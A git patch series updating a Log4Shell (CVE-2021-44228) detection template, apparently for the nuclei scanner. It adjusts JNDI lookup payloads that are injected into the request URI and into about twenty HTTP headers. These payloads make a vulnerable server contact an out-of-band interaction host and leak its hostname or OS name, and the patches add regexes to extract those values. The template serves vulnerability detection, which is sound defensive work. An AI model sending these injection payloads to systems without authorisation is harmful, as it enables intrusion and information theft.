From 08310d6a977f49d735e8bc522ff42ba10f72d179 Mon Sep 17 00:00:00 2001 From: j4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Thu, 20 Apr 2023 22:03:27 +0800 Subject: [PATCH 1/7] Update CVE-2021-44228.yaml --- cves/2021/CVE-2021-44228.yaml | 46 ++++++++++++++++------------------- 1 file changed, 21 insertions(+), 25 deletions(-) diff --git a/cves/2021/CVE-2021-44228.yaml b/cves/2021/CVE-2021-44228.yaml index dd1200ac1a..c1c2fa9936 100644 --- a/cves/2021/CVE-2021-44228.yaml +++ b/cves/2021/CVE-2021-44228.yaml @@ -23,31 +23,29 @@ info: requests: - raw: - | - GET /?x=${jndi:ldap://${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1 + GET /solr/admin/cores?action=${jndi:ldap://${sys:os.name}.uri.{{interactsh-url}}/a} HTTP/1.1 Host: {{Hostname}} - - | GET / HTTP/1.1 Host: {{Hostname}} - Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}} - Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}} - Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}} - Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}} - Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}} - Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}} - Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}} - Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}} - Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}} - Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}} - Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}} - Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}} - User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}} - X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}} - X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}} - X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}} - X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}} - X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}} - + Accept: ${jndi:ldap://${sys:os.name}.accept.{{interactsh-url}}} + Accept-Encoding: ${jndi:ldap://${sys:os.name}.acceptencoding.{{interactsh-url}}} + Accept-Language: ${jndi:ldap://${sys:os.name}.acceptlanguage.{{interactsh-url}}} + Access-Control-Request-Headers: ${jndi:ldap://${sys:os.name}.accesscontrolrequestheaders.{{interactsh-url}}} + Access-Control-Request-Method: ${jndi:ldap://${sys:os.name}.accesscontrolrequestmethod.{{interactsh-url}}} + Authentication: Basic ${jndi:ldap://${sys:os.name}.authenticationbasic.{{interactsh-url}}} + Authentication: Bearer ${jndi:ldap://${sys:os.name}.authenticationbearer.{{interactsh-url}}} + Cookie: ${jndi:ldap://${sys:os.name}.cookiename.{{interactsh-url}}}=${jndi:ldap://${sys:os.name}.cookievalue.{{interactsh-url}}} + Location: ${jndi:ldap://${sys:os.name}.location.{{interactsh-url}}} + Origin: ${jndi:ldap://${sys:os.name}.origin.{{interactsh-url}}} + Referer: ${jndi:ldap://${sys:os.name}.referer.{{interactsh-url}}} + Upgrade-Insecure-Requests: ${jndi:ldap://${sys:os.name}.upgradeinsecurerequests.{{interactsh-url}}} + User-Agent: ${jndi:ldap://${sys:os.name}.useragent.{{interactsh-url}}} + X-Api-Version: ${jndi:ldap://${sys:os.name}.xapiversion.{{interactsh-url}}} + X-CSRF-Token: ${jndi:ldap://${sys:os.name}.xcsrftoken.{{interactsh-url}}} + X-Druid-Comment: ${jndi:ldap://${sys:os.name}.xdruidcomment.{{interactsh-url}}} + X-Forwarded-For: ${jndi:ldap://${sys:os.name}.xforwardedfor.{{interactsh-url}}} + X-Origin: ${jndi:ldap://${sys:os.name}.xorigin.{{interactsh-url}}} stop-at-first-match: true matchers-condition: and matchers: @@ -59,7 +57,7 @@ requests: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # windows or linux extractors: - type: kval @@ -76,6 +74,4 @@ requests: part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - -# Enhanced by mp on 2022/02/28 + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output From 8051b30eee5d6615856b39998ab2cf5a9cedb661 Mon Sep 17 00:00:00 2001 From: j4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Thu, 20 Apr 2023 22:06:54 +0800 Subject: [PATCH 2/7] update uri --- cves/2021/CVE-2021-44228.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-44228.yaml b/cves/2021/CVE-2021-44228.yaml index c1c2fa9936..4d05105b48 100644 --- a/cves/2021/CVE-2021-44228.yaml +++ b/cves/2021/CVE-2021-44228.yaml @@ -23,7 +23,7 @@ info: requests: - raw: - | - GET /solr/admin/cores?action=${jndi:ldap://${sys:os.name}.uri.{{interactsh-url}}/a} HTTP/1.1 + GET /?x=${jndi:ldap://${sys:os.name}.uri.{{interactsh-url}}/a} HTTP/1.1 Host: {{Hostname}} - | GET / HTTP/1.1 From 50f218f2e6256a06b2284cb2d4a3d64a565c90e4 Mon Sep 17 00:00:00 2001 From: j4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Thu, 20 Apr 2023 23:54:41 +0800 Subject: [PATCH 3/7] update Accept --- cves/2021/CVE-2021-44228.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-44228.yaml b/cves/2021/CVE-2021-44228.yaml index 4d05105b48..30cc932d07 100644 --- a/cves/2021/CVE-2021-44228.yaml +++ b/cves/2021/CVE-2021-44228.yaml @@ -28,7 +28,7 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - Accept: ${jndi:ldap://${sys:os.name}.accept.{{interactsh-url}}} + Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${sys:os.name}.accept.{{interactsh-url}}} Accept-Encoding: ${jndi:ldap://${sys:os.name}.acceptencoding.{{interactsh-url}}} Accept-Language: ${jndi:ldap://${sys:os.name}.acceptlanguage.{{interactsh-url}}} Access-Control-Request-Headers: ${jndi:ldap://${sys:os.name}.accesscontrolrequestheaders.{{interactsh-url}}} From f7d012a580b7f09c26ff6841d45cf206a2c11ee3 Mon Sep 17 00:00:00 2001 From: j4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Mon, 24 Apr 2023 01:42:42 +0800 Subject: [PATCH 4/7] Update CVE-2021-44228.yaml --- cves/2021/CVE-2021-44228.yaml | 52 +++++++++++++++++++---------------- 1 file changed, 29 insertions(+), 23 deletions(-) diff --git a/cves/2021/CVE-2021-44228.yaml b/cves/2021/CVE-2021-44228.yaml index 30cc932d07..54514290c2 100644 --- a/cves/2021/CVE-2021-44228.yaml +++ b/cves/2021/CVE-2021-44228.yaml @@ -2,7 +2,7 @@ id: CVE-2021-44228 info: name: Apache Log4j2 Remote Code Injection - author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea + author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo severity: critical description: | Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. @@ -20,32 +20,38 @@ info: cwe-id: CWE-502 tags: cve,cve2021,rce,oast,log4j,injection,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + requests: - raw: - | - GET /?x=${jndi:ldap://${sys:os.name}.uri.{{interactsh-url}}/a} HTTP/1.1 + GET /solr/admin/cores?action=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1 Host: {{Hostname}} + - | GET / HTTP/1.1 Host: {{Hostname}} - Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${sys:os.name}.accept.{{interactsh-url}}} - Accept-Encoding: ${jndi:ldap://${sys:os.name}.acceptencoding.{{interactsh-url}}} - Accept-Language: ${jndi:ldap://${sys:os.name}.acceptlanguage.{{interactsh-url}}} - Access-Control-Request-Headers: ${jndi:ldap://${sys:os.name}.accesscontrolrequestheaders.{{interactsh-url}}} - Access-Control-Request-Method: ${jndi:ldap://${sys:os.name}.accesscontrolrequestmethod.{{interactsh-url}}} - Authentication: Basic ${jndi:ldap://${sys:os.name}.authenticationbasic.{{interactsh-url}}} - Authentication: Bearer ${jndi:ldap://${sys:os.name}.authenticationbearer.{{interactsh-url}}} - Cookie: ${jndi:ldap://${sys:os.name}.cookiename.{{interactsh-url}}}=${jndi:ldap://${sys:os.name}.cookievalue.{{interactsh-url}}} - Location: ${jndi:ldap://${sys:os.name}.location.{{interactsh-url}}} - Origin: ${jndi:ldap://${sys:os.name}.origin.{{interactsh-url}}} - Referer: ${jndi:ldap://${sys:os.name}.referer.{{interactsh-url}}} - Upgrade-Insecure-Requests: ${jndi:ldap://${sys:os.name}.upgradeinsecurerequests.{{interactsh-url}}} - User-Agent: ${jndi:ldap://${sys:os.name}.useragent.{{interactsh-url}}} - X-Api-Version: ${jndi:ldap://${sys:os.name}.xapiversion.{{interactsh-url}}} - X-CSRF-Token: ${jndi:ldap://${sys:os.name}.xcsrftoken.{{interactsh-url}}} - X-Druid-Comment: ${jndi:ldap://${sys:os.name}.xdruidcomment.{{interactsh-url}}} - X-Forwarded-For: ${jndi:ldap://${sys:os.name}.xforwardedfor.{{interactsh-url}}} - X-Origin: ${jndi:ldap://${sys:os.name}.xorigin.{{interactsh-url}}} + Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}} + Accept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}} + Accept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}} + Access-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}} + Access-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}} + Authentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}} + Authentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}} + Cookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}} + Location: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}} + Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}} + Referer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}} + Upgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}} + User-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}} + X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}} + X-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}} + X-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}} + X-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}} + X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}} + stop-at-first-match: true matchers-condition: and matchers: @@ -57,7 +63,7 @@ requests: - type: regex part: interactsh_request regex: - - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # windows or linux + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval @@ -68,10 +74,10 @@ requests: part: interactsh_request group: 2 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output From ff44b758128d478a3aa9fef7f0f28b5b250f3133 Mon Sep 17 00:00:00 2001 From: j4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Mon, 24 Apr 2023 01:43:03 +0800 Subject: [PATCH 5/7] Update CVE-2021-44228.yaml --- cves/2021/CVE-2021-44228.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-44228.yaml b/cves/2021/CVE-2021-44228.yaml index 54514290c2..1c49ba9ccc 100644 --- a/cves/2021/CVE-2021-44228.yaml +++ b/cves/2021/CVE-2021-44228.yaml @@ -27,7 +27,7 @@ variables: requests: - raw: - | - GET /solr/admin/cores?action=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1 + GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1 Host: {{Hostname}} - | From 966d37b02ee7e78dc4f621e16f346393fa68c088 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 May 2023 09:07:12 +0530 Subject: [PATCH 7/7] updated template path and protocol name --- {cves => http/cves}/2021/CVE-2021-44228.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename {cves => http/cves}/2021/CVE-2021-44228.yaml (99%) diff --git a/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml similarity index 99% rename from cves/2021/CVE-2021-44228.yaml rename to http/cves/2021/CVE-2021-44228.yaml index 1c49ba9ccc..2acc48aeb5 100644 --- a/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -24,7 +24,7 @@ variables: rand1: '{{rand_int(111, 999)}}' rand2: '{{rand_int(111, 999)}}' -requests: +http: - raw: - | GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1